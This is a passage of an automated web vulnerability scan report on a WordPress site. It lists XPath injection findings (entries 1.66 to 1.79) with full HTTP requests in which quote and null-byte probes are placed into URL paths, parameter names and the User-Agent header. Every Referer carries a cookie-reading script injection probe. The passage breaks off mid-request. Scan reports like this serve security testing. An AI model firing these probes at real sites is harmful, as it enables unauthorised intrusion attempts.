<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.66. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js?1'=1 HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:01 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:02 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44393

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.67. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content'/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:58 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:59 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.68. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes'/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:18:10 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:18:11 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.69. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 3, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes/rt_mynxx_wp'/js/rokbox/themes/mynxx/rokbox-style.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:18:22 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:18:22 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.70. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css

Issue detail

The REST URL parameter 4 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 4, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes/rt_mynxx_wp/js'/rokbox/themes/mynxx/rokbox-style.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:18:33 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:18:34 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.71. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css

Issue detail

The REST URL parameter 5 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 5, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes/rt_mynxx_wp/js/rokbox'/themes/mynxx/rokbox-style.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:18:45 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:18:45 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.72. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css

Issue detail

The REST URL parameter 6 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 6, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes/rt_mynxx_wp/js/rokbox/themes'/mynxx/rokbox-style.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:18:57 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:18:57 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.73. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css

Issue detail

The REST URL parameter 7 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 7, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx'/rokbox-style.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:19:08 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:19:09 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.74. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css

Issue detail

The REST URL parameter 8 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 8, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css' HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:19:11 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:19:12 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.75. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css

Issue detail

The User-Agent HTTP header appears to be vulnerable to XPath injection attacks. The payload %00' was submitted in the User-Agent HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10%00'
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:24 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:25 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.76. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css?1'=1 HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:02 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:02 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44393

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.77. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content'/themes/rt_mynxx_wp/js/rokmoomenu.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:58 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:59 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44310

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.78. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes'/rt_mynxx_wp/js/rokmoomenu.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:18:10 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:18:11 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44310

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.79. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 3, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes/rt_mynxx_wp'/js/rokmoomenu.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
